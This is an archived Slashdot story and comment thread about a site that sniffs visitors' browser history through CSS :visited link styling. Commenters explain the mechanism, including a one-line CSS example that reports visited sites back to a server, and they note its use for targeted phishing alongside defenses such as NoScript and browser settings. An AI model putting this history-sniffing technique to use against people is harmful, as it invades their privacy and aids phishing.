Please create an account to participate in the Slashdot moderation system

 



Forgot your password?
typodupeerror
×
Image

Your Browser History Is Showing 174

tiffanydanica writes "For a lot of us our browser history is something we consider private, or at least not something we want to expose to every website we visit. Web2.0collage is showing just how easy it is (with code!) for sites to determine what sites you visit. When you visit the site it sniffs your browser history, and creates a collage of the (safe for work) sites that you visit. It is an interesting application of potentially scary technology (imagine a job application site using this to screen candidates). You can jump right into having your history sniffed if you so desire. While the collages are cool on their own merit, they also serve as an illustration of the privacy implications of browser history sniffing."

*

This discussion has been archived. No new comments can be posted.

Your Browser History Is Showing

Comments Filter:
  • by account_deleted ( 4530225 ) on Thursday July 02, 2009 @10:05AM (#28557159)
    Comment removed based on user account deletion
  • So just disable your browser history if you are that paranoid about it. It only takes a few clicks in any major browser. Plus if you for some reason don't want to do that, most browsers now have a private mode that doesn't record those sites in the history.
    • Re:...So.... (Score:5, Insightful)

      by MyLongNickName ( 822545 ) on Thursday July 02, 2009 @10:21AM (#28557397) Journal

      So, the choice is

      1. Allow everyone in the world to sniff my browsing history.
      2. give up the ability to see my own browsing history.

      Somehow, this doesn't seem right...

    • Re:...So.... (Score:4, Insightful)

      by causality ( 777677 ) on Thursday July 02, 2009 @10:21AM (#28557399)

      So just disable your browser history if you are that paranoid about it. It only takes a few clicks in any major browser. Plus if you for some reason don't want to do that, most browsers now have a private mode that doesn't record those sites in the history.

      I think the point can be explained this way: "who's the numbnuts who thought it would be a great idea to make this information available to anyone who asks for it?" Speaking generally about all user data and all remote IP addresses, all remote hosts are on a need-to-know basis and 99.999% of the time, they don't need to know. They particularly don't need to know without prompting the user and asking "do you want to give out this information?" with that question defaulting to "No" and a box, checked by default, which says "Remember this preference".

      You can subtly dismiss it as paranoia if you like. That doesn't excuse poor design. Also, globally disabling the browser history would deny the remote Web site access to the browser's history, sure, but it would also deprive the user of this local feature. There should be a more reasonable alternative to either "lose this feature" or "make this feature available to anyone who asks with no regard for privacy." Apparently NoScript provides such an alternative.

      • by Qzukk ( 229616 )

        who's the numbnuts who thought it would be a great idea to make this information available to anyone who asks for it?

        Changing the color of a link you've visited has been around forever. Changing the style of a link you've visited to one that can send information back to the server eg "background-image:url(/visited.pl?site=slashdot)", that's newer.

        • who's the numbnuts who thought it would be a great idea to make this information available to anyone who asks for it?

          Changing the color of a link you've visited has been around forever. Changing the style of a link you've visited to one that can send information back to the server eg "background-image:url(/visited.pl?site=slashdot)", that's newer.

          Sorry but I don't think I fully understand how that relates to this story. Would you elaborate please? What you describe there sounds like a re-implementation of so-called "http ping."

          • Re:...So.... (Score:5, Informative)

            by uglyduckling ( 103926 ) on Thursday July 02, 2009 @10:41AM (#28557681) Homepage
            Because that's how this vulnerability works. It doesn't really sniff your browser history - as such - what it does it it has a huge page full of popular websites, displays them as links (invisible) and sees which links change colour. There's no easy workaround that will both allow you to have a history, and allow web pages to display something different (e.g. link colour / style) for pages that you have visited already. Perhaps the best compromise would be to allow changes to link style only within the domain of the page that's attempting to set that style. But it's still a major backward step in usability. The other option might be to disable link styles for pages that have greater than a certain number of links (say 50).
            • Re: (Score:3, Insightful)

              by Anonymous Coward

              There's no easy workaround that will both allow you to have a history, and allow web pages to display something different (e.g. link colour / style) for pages that you have visited already.

              Sure there is. Have your browser always pull the visited and unvisited styles, then just display the relevant one. Problem solved.

              • That would make it harder, but not impossible. If you have a background image for each link style, and give that background image a unique (one-time generated) name, then the server would know when that image had been pulled, and hence which links had been visited.
                • Ooooh, I just re-read your post and see what you mean. Sorry. I still think there could be ways of doing it though, like making the images different sizes and then seeing what size the containing object has become - in fact this would work by using fonts of different sizes. I think once you start trying to prevent this, you pull on one little thread and the whole CSS/DOM thing unravels.
            • Of course there is. The easy workaround is to automatically load all of the link background images. Then the server can't sniff anything.

            • Re: (Score:3, Insightful)

              by AtomicJake ( 795218 )

              Because that's how this vulnerability works. It doesn't really sniff your browser history - as such - what it does it it has a huge page full of popular websites, displays them as links (invisible) and sees which links change colour. There's no easy workaround that will both allow you to have a history, and allow web pages to display something different (e.g. link colour / style) for pages that you have visited already.

              The Web page (HTML, Javascript code, ...) should not be able to detect such differences and be able to report them back home; it's OK to tell the browser how to render visited links, but not to get the feedback by the browser how it rendered which links. The feedback is actually breaking the sandbox principle.

              I actually think that the current direction to "the browser is the OS (or even worse, the Flash player in your browser is the OS)" is a security nightmare.

              • I think there would always be a way round this. I suspect there would be a clever computational way of benchmarking the rendering engine and then creating images of different sizes on-the-fly in a complex layout and finding out which combinations were rendered. Sounds complex, but with a little thought I think there will always be a workaround.
              • The Web page (HTML, Javascript code, ...) should not be able to detect such differences and be able to report them back home; it's OK to tell the browser how to render visited links, but not to get the feedback by the browser how it rendered which links.

                So say I make my :visited links twice as tall as my regular links. Are you saying JavaScript shouldn't be able to read the height of the element? That would break all scripts that position anything. Once I can read it with JavaScript, I can always send it back home (e.g., via AJAX, add an image or iframe with a magic URL the browser will load, . . .).

                The only way I see to fix this would be to sharply limit the properties that can be set based on :visited, to things like color and background-image; fetc

                • The Web page (HTML, Javascript code, ...) should not be able to detect such differences and be able to report them back home; it's OK to tell the browser how to render visited links, but not to get the feedback by the browser how it rendered which links.

                  So say I make my :visited links twice as tall as my regular links. Are you saying JavaScript shouldn't be able to read the height of the element? That would break all scripts that position anything. Once I can read it with JavaScript, I can always send it back home (e.g., via AJAX, add an image or iframe with a magic URL the browser will load, . . .).

                  You are completely right.

                  The only way I see to fix this would be to sharply limit the properties that can be set based on :visited, to things like color and background-image; fetch background images for :visited links even if they aren't visited and the image won't be used; and lie to script when it asks about the color of a visited link (by pretending it's not visited in all cases). You can't even allow things like font-weight to be set: anything that affects sizes is going to be impossible to hide from script.

                  Good idea making :visited very restricted.

                  Or you could, you know, not worry that random sites can figure out that omg you visit Slashdot (very inefficiently, by the way). That's the tactic I'm taking, personally.

                  Here, I do not agere at all. This is a privacy issue. And a privacy issue can become very fast a security issue (phishing). And, even if is not phishing, I do not want /. or any other page to let find out what I looked at before. Of course, for tracking sites this is a very cool possibility to get more information from you (and to earn more dollars with this information). Your tactic may work for you, but for most users it's a privacy n

                  • Here, I do not agere at all. This is a privacy issue. And a privacy issue can become very fast a security issue (phishing). And, even if is not phishing, I do not want /. or any other page to let find out what I looked at before. Of course, for tracking sites this is a very cool possibility to get more information from you (and to earn more dollars with this information). Your tactic may work for you, but for most users it's a privacy nightmare. And you don't need to be paranoiac ...

                    I strongly suspect that most users don't really care that much. And I don't think it's very worrisome even if you're concerned about privacy. The concept has been public for eight years now, but there's not a single attack that's ever been identified in the wild, nor is there any indication that one is likely anytime soon.

                    It's a complicated and slow technique that gets you very little useful information. Phishers could (and do) more profitably spending their time trying to get more people to visit thei

            • by ceoyoyo ( 59147 )

              "There's no easy workaround that will both allow you to have a history, and allow web pages to display something different (e.g. link colour / style) for pages that you have visited already."

              Wait a minute, you could just make it work like it's SUPPOSED to. The page says "hey, can you make any visited links a different colour?" and my browser, if I say so, displays those links to me in a different colour.

              If for some reason the web server wants to know what's happening on my end (say, it wants to do some web

          • Re:...So.... (Score:4, Informative)

            by vidarh ( 309115 ) <vidar@hokstad.com> on Thursday July 02, 2009 @10:47AM (#28557761) Homepage Journal
            Whether or not you can *read* the history of a browser is irrelevant if you want to know whether or not a user has visited a specific site. In that case you can simply create a page that will set appropriate CSS rules to make the browser try to load a specific background image for visited URL's for each site you want to check for. Then when the user loads your page, you'll get a barrage of what you call http pings, and all you need to do is collate that information and you know which of the sites you care about that the user has visited recently.

            It's less invasive than being able to wholesale dump the browser history (you don't know when the sites were visited, for example), but protecting against it also means disabling functionality (you'd need to prevent an app from being able to tell whether or not a link on it's own page has been clicked via CSS rules or other means, which means either disabling the distinction between visited or not completely or disabling reading back style information and/or preventing setting CSS rules that trigger loading of external resources).

  • black image (Score:5, Funny)

    by Red Flayer ( 890720 ) on Thursday July 02, 2009 @10:07AM (#28557191) Journal
    I tried it.

    I got a black screen (apparently no history to be shown).

    Either the engine is borked, or my privacy add-ins are working properly...

    Or possible the Oracle of Browser History has determined that my history is darker than the darkest dark, and refused to show images.
  • Not mine (Score:5, Informative)

    by Monoman ( 8745 ) on Thursday July 02, 2009 @10:08AM (#28557213) Homepage

    No Script baby

    • No Script baby

      I second that emotion. I never browse at work without it.

    • Re: (Score:1, Redundant)

      by Yaa 101 ( 664725 )

      It is unbelievable how many sites try to cram your surfing session with all sorts of cross scripting and other nuisance from 3rd parties.

      Noscript essentially gives back the decision of running scripts to the owner of the web client.

    • Re: (Score:1, Insightful)

      by Anonymous Coward

      It can also be done using CSS and then grepping accesslog. NoScript will not help you there.

      • It can also be done using CSS and then grepping accesslog. NoScript will not help you there.

        That could be easily circumvented if browsers just fetched the image unconditionally for :visited. The script methods are impossible to stop without locking down what properties are valid to use for :visited.

    • Re:Not mine (Score:5, Informative)

      by gazbo ( 517111 ) on Thursday July 02, 2009 @10:38AM (#28557641)
      No Script may help in this case, but not in general. There was a story here only a couple of weeks back talking about a pure CSS method for doing exactly this.
      • Well, then I'll install a NoCSS add-on. Who needs layout anyway.

  • Being able to query whether or not I visit common sites is a far cry from my browser history being shown, but still this needs to be fixed.

    How long until a politician gets busted for visiting a child pornography website?
    • In regards to your sig, and only your sig, the mayor of my hometown has already been busted for child pornography/child entisement. He one of many articles. [jsonline.com]
  • And all it showed was pictures of raptors and deadbolts.
  • by Anonymous Coward on Thursday July 02, 2009 @10:09AM (#28557231)

    This methodology is actually quite old. It takes advantage of the CSS a:visited tag. Imagine making a:visited have a width of 5 and A have a width of 100. Drop another element right next to it and then after the page loads, check to see the location of that second element. Even if the browser attempts to block JS from accessing the style applied to the visited link, it can't keep you from accessing everything else on the page. Voila, by injecting a lot of links onto the page, you can find out where a person has been.

    This is particularly dangerous because it can make Phishing very powerful. Imagine creating a resource that collects email addresses, but on that same page running this script to check the login pages of major banks. Then, you can send out targeted emails to people who you know have bank accounts at particular providers.

  • I went to the sniffing page linked from the summary and it stayed on 0% for 5 minutes so I guess it does not work for me.

    NoScript (I presume) saves the day again!
    • Eh, noscript has become adware in the last year. The reason it keeps updating itself is for ads and to make sure you aren't blocking its own ads, and not for actual updates.

      • by swb ( 14022 )

        Are you sure about that?

        It seems to work fine and I don't notice any additional ads, and when it does update there almost always seems to be something "new" that has been added.

      • by radtea ( 464814 ) on Thursday July 02, 2009 @10:36AM (#28557609)

        Eh, noscript has become adware in the last year.

        This is an out-dated claim: http://hackademix.net/2009/05/04/dear-adblock-plus-and-noscript-users-dear-mozilla-community/ [hackademix.net] It pertains to an ugly episode for which the NoScript author is rightfully apologetic.

        It's a curious phenomenon, how the mind closes once a certain type of conclusion has been reached. This is the phenomenon that lead to the the NoScript/AbBlock war, and it seems entirely unfruitful to emulate exactly the kind of thinking that caused the issue in the first place.

        • Just because he apologised and changed the behaviour, that doesn't mean we're all happy-clappy about noscript again.

          Trust, once lost, takes time to be earned again.

    • by Krneki ( 1192201 )
      Same story here, it does not work.
    • I went to the sniffing page linked from the summary and it stayed on 0% for 5 minutes so I guess it does not work for me. NoScript (I presume) saves the day again!

      Well, yeah. The whole thing is JavaScript powered, so if you're not executing their JavaScript it's going to stay at 0% for a lot longer than 5 minutes ...

      This is defnitely not the first time I was glad I use NoScript.

  • It's slashdotted (Score:4, Informative)

    by tepples ( 727027 ) <tepples@gm[ ].com ['ail' in gap]> on Thursday July 02, 2009 @10:11AM (#28557249) Homepage Journal
    Twice in a row, all I get is

    Expired

    This URL has expired. Please return to the home page.This is likely because of increased load. It shouldn't happen again.

  • Can we please just have something that doesn't give up our privacy every three seconds? If you like having a browser history or enjoy the benefits of javascript, you're screwed. The only answer is to disable one or both of those.

    • by Krneki ( 1192201 )
      Most of the people here are getting errors, while still enjoining the benefits of history or Java scripts.

       
  • ERROR
    The requested URL could not be retrieved

    While trying to retrieve the URL: http://web2.0collage.com/app/;((%22k%22%20.%20%22(1970%201%2079269687)%22)) [0collage.com]

    The following error was encountered:

    * Unable to forward this request at this time.

    This request could not be forwarded to the origin server or to any parent caches. The most likely cause for this error is that:

    * The cache administrator does not allow this cache to make direct connections to origin se

    • slashdotted most likely. According to #scheme, where the creatore is hanging out, the webserver ran out of virtual memory and shat its self. Its been re-configured so it might be running better now.
  • by ugen ( 93902 ) on Thursday July 02, 2009 @10:30AM (#28557541)

    http://jeremiahgrossman.blogspot.com/2006/08/i-know-where-youve-been.html [blogspot.com]

    Of course there is no reason this is still not fixed (by being able to disable a:visited style).

    • Re: (Score:2, Informative)

      by maxume ( 22995 )

      Bugzilla bug 57351 was reported in October of 2000:

      https://bugzilla.mozilla.org/show_bug.cgi?id=57351 [mozilla.org]

      (Bugzilla may or may not still hate Slashdot, copy and paste if clicking the link does not work).

    • by interiot ( 50685 )

      Of course there is no reason this is still not fixed (by being able to disable a:visited style)

      If the issue were so simple, why has no major browser implemented a proper fix for this yet, despite the fact that we've known about the issue for nine years [mozilla.org] ?

      A:visited is very useful to the user in some circumstances, so it's unacceptable to turn it off for every user in every circumstance. Firefox 3.5 added a hidden preference [squarefree.com] in case some users want to turn it on sometimes, but that solution doesn't work fo

  • wommens (Score:3, Funny)

    by psergiu ( 67614 ) on Thursday July 02, 2009 @10:33AM (#28557579)

    Quote from the final page of the script:

    You can get your web2.0collage as a mug,wommens ...

    I can have it as WHAT ? Okay, then can i have my wommens without the /. favicon all over them ?

  • Maybe it's an old story but I found this site that uses the same technique:
    http://www.schillmania.com/random/humour/web20awareness/

  • It's like a collage of my favorite porn sites.
  • I am using Firefox 3.0.11 on Ubuntu 9.04 with a T7500 CPU (Core 2 Duo 2.2 GHz).

    That site pegged one core of my CPU.

    Really? That would be damn obvious, not to mention most people would see the slow down and close the browser.

    • I am using Firefox 3.0.11 on Ubuntu 9.04 with a T7500 CPU (Core 2 Duo 2.2 GHz).

      That site pegged one core of my CPU.

      Really? That would be damn obvious, not to mention most people would see the slow down and close the browser.

      If they were also reading Slashdot then I don't know how the hell they'd notice.

      Seriously. I like Slashdot very much, but its JS is atrociously, embarassingly slow.

  • by denominateur ( 194939 ) on Thursday July 02, 2009 @10:49AM (#28557797) Homepage

    in firefox:

      set layout.css.visited_links_enabled to FALSE in about config

    This will break (a tiny part of) the layout of sites that use CSS to change the style of links that were visited by the user, but it protects against this problem.

  • by smackenzie ( 912024 ) on Thursday July 02, 2009 @11:19AM (#28558133)
    I see France,
    I see you shopping online at Victoria's Secret for underpants...
  • ERROR

    The requested URL could not be retrieved

    While trying to retrieve the URL: http://web2.0collage.com/app/ [0collage.com];...

    The following error was encountered:

    Unable to forward this request at this time.

    This request could not be forwarded to the origin server or to any parent caches. The most likely cause for this error is that:

    Being on slashdot!

    imagemagick bindings that leak memory

    a hard limit of 4gb in a 64bit version of mzscheme for reason's I don't know

    Your cache administrator is webmaster.

    Generat

  • use the niche browsers for your private surfing and IE/Firefox for important things

    • No. It was able to sniff my history and I'm running Safari 4.0.1 (5530.18). This has more to do with JavaScript and CSS breaking the fundamental user model of the web. It's not a problem with any particular browser, it's the web standard that is flawed. As we move toward better DOM, JavaScript and web apps, expect this kind of stuff even more.
  • by user24 ( 854467 )

    I'm stunned this is still exploitable. This bug is YEARS old.

  • Yawn... been waiting for the collage for about ten minutes so far but the progress bar seems stuck at 0%.

    I wonder if it has something to do with the unchecked "Enable JavaScript" checkbox I have displayed at the bottom of my Opera 10 window.

  • Granted, some of you are concerned about people finding out the sites you visit, but what about a real world problem (or two)?

    Some time back, there was an attack that threw a phony dialog pop-up saying that your timeout had been expired at your bank site. Combine that with being able to see *what* bank's site (and whether or not you have been at it recently). This could even be injected through a compromised ad-server system or the like. Maybe you don't even have to visit my site. There's some moving part

  • I want to browse "safely"; protection against most XSS and sh1t like scripts reading my browser history, etc. However, I want the sites that I visit to "work" at the same time. Ya, NoScript is great, but with sites globally disallowed, the Internets are useless.

    Can anyone offer some suggestions to reasonably lock down FF where a balance is struck between security and usability??

    TIA, --ponga

Money is better than poverty, if only for financial reasons.

Working...